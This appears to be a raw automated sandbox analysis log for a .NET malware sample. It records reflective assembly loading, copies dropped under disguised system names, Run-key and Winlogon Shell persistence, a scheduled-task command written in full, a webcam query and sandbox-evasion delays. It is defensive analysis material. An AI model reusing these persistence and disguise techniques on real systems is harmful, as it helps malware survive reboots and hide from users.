Source: Binary string: 8C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.pdb source: KtMg6d1Ivx.exe, 00000000.00000002.2040685305.0000000003804000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: KtMg6d1Ivx.exe, _.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: dZtDLPHWGnqMECrRIGtvnUL.exe.0.dr, _.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: csrss.exe.0.dr, _.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: dZtDLPHWGnqMECrRIGtvnUL.exe0.0.dr, _.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: Registry.exe.0.dr, _.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: conhost.exe.0.dr, _.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.cmdline
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.cmdline
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Code function: 0_2_00007FF848F300BD pushad ; iretd 0_2_00007FF848F300C1
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Code function: 0_2_00007FF848F343DE push esi; retn 000Bh 0_2_00007FF848F343DF
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 11_2_00007FF848F100BD pushad ; iretd 11_2_00007FF848F100C1
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 11_2_00007FF848F143DE push esi; retn 000Bh 11_2_00007FF848F143DF
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 12_2_00007FF848F837FA pushad ; iretd 12_2_00007FF848F838B1
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 12_2_00007FF848F86030 push edx; iretd 12_2_00007FF848F86031
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 12_2_00007FF848F3F3FC pushfd ; ret 12_2_00007FF848F3F3FD
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 12_2_00007FF848F300BD pushad ; iretd 12_2_00007FF848F300C1
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 12_2_00007FF848F343DE push esi; retn 000Bh 12_2_00007FF848F343DF
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 29_2_00007FF848F300BD pushad ; iretd 29_2_00007FF848F300C1
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 29_2_00007FF848F343DE push esi; retn 000Bh 29_2_00007FF848F343DF
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 29_2_00007FF848F3F3FC pushfd ; ret 29_2_00007FF848F3F3FD
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 29_2_00007FF848F837FA pushad ; iretd 29_2_00007FF848F838B1
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 29_2_00007FF848F86030 push edx; iretd 29_2_00007FF848F86031
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 30_2_00007FF848F637FA pushad ; iretd 30_2_00007FF848F638B1
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 30_2_00007FF848F66030 push edx; iretd 30_2_00007FF848F66031
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 30_2_00007FF848F1F3FC pushfd ; ret 30_2_00007FF848F1F3FD
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 30_2_00007FF848F100BD pushad ; iretd 30_2_00007FF848F100C1
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 30_2_00007FF848F143DE push esi; retn 000Bh 30_2_00007FF848F143DF
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Code function: 31_2_00007FF848F200BD pushad ; iretd 31_2_00007FF848F200C1
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Code function: 31_2_00007FF848F243DE push esi; retn 000Bh 31_2_00007FF848F243DF
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Code function: 32_2_00007FF848F043DE push esi; retn 000Bh 32_2_00007FF848F043DF
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Code function: 32_2_00007FF848F000BD pushad ; iretd 32_2_00007FF848F000C1
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 33_2_00007FF848F637FA pushad ; iretd 33_2_00007FF848F638B1
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 33_2_00007FF848F66030 push edx; iretd 33_2_00007FF848F66031
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 33_2_00007FF848F100BD pushad ; iretd 33_2_00007FF848F100C1
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 33_2_00007FF848F143DE push esi; retn 000Bh 33_2_00007FF848F143DF
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 33_2_00007FF848F1F3FC pushfd ; ret 33_2_00007FF848F1F3FD
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 34_2_00007FF848F1F3FC pushfd ; ret 34_2_00007FF848F1F3FD
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 34_2_00007FF848F637FA pushad ; iretd 34_2_00007FF848F638B1
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 34_2_00007FF848F66030 push edx; iretd 34_2_00007FF848F66031
Source: 0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack, IgtwOf7haQYRmSPKHpT.cs | High entropy of concatenated method names: 'KNf7CrbwDi', 'Dru7tS2emd', 'cIkynFqwA4ILYVq6Y4le', 'f0clSPqwG5C7uqOMyk10', 'FFGPVPqwyMtskGZa3DBH', 'NIZjtYqwiIXXuFgIYKDf', 'hk52ahqwzSmuEMllte89', 'W338d5qljj24NaR3B8Ab', 'ASuIwNqlqxn1YdUDTuND'
Source: 0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack, kJHYU8BQ26cy2LYJJG3.cs | High entropy of concatenated method names: 'STjBGxso8e', 'cBc44Xq406u6deH9SPiF', 'EZqIi2q4bsUlJPorFL15', 'dJJZbbq4YWMCyJkQ51uM', 'par5TIq4Dqckv0avsc3P', 'SINXhtq4SQSq8CNe2D75', 'nAshalq4U0xCUwHhqGja', 'VwGlQIq4LXPjfNHfHW7A', 'qHxspfq4fXu8cveHeCuu'

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (15 identical events)
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe
Source: unknown | Executable created and started: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe
Source: unknown | Executable created and started: C:\Windows\ImmersiveControlPanel\pris\conhost.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File created: C:\Windows\ImmersiveControlPanel\pris\conhost.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File created: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File created: C:\Users\user\Desktop\bveMYDWO.log
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | File created: C:\Users\user\Desktop\vnUJHstD.log
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File created: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File created: C:\Windows\ImmersiveControlPanel\pris\conhost.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File created: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File created: C:\Users\user\Desktop\bveMYDWO.log
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | File created: C:\Users\user\Desktop\vnUJHstD.log

Boot Survival

                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dZtDLPHWGnqMECrRIGtvnUL
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dZtDLPHWGnqMECrRIGtvnUL
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeMemory allocated: 1360000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeMemory allocated: 1AF30000 memory reserve | memory write watch
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 7B0000 memory reserve | memory write watch
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 1A240000 memory reserve | memory write watch
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 1260000 memory reserve | memory write watch
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 1B120000 memory reserve | memory write watch
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMemory allocated: 1440000 memory reserve | memory write watch
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMemory allocated: 1B150000 memory reserve | memory write watch
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMemory allocated: 1000000 memory reserve | memory write watch
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMemory allocated: 1210000 memory reserve | memory write watch
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeMemory allocated: 26C0000 memory reserve | memory write watch
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeMemory allocated: 1A6C0000 memory reserve | memory write watch
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeMemory allocated: 3210000 memory reserve | memory write watch
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeMemory allocated: 1B210000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: 8C0000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: 1A440000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: EA0000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: 1AB50000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: DB0000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: 1A940000 memory reserve | memory write watch
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: F90000 memory reserve | memory write watch
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 1AC00000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: 1540000 memory reserve | memory write watch
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeMemory allocated: 1B310000 memory reserve | memory write watch
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMemory allocated: A20000 memory reserve | memory write watch
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMemory allocated: 1A490000 memory reserve | memory write watch
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeMemory allocated: 2DC0000 memory reserve | memory write watch
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeMemory allocated: 1ADC0000 memory reserve | memory write watch
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 7A0000 memory reserve | memory write watch
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeMemory allocated: 1A4E0000 memory reserve | memory write watch
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 12_2_00007FF848F7CF80 sldt word ptr [eax]
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 600000
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599855
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599735
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599594
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599469
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599359
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599250
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 599141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 599031
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598922
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598812
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598703
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598594
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 3600000
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598484
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598375
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598266
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 598016
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597906
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597797
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597688
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597571
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597469
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597359
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597250
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 597031
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596922
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596812
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596703
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596594
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596469
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596359
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596250
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Thread delayed: delay time: 596141
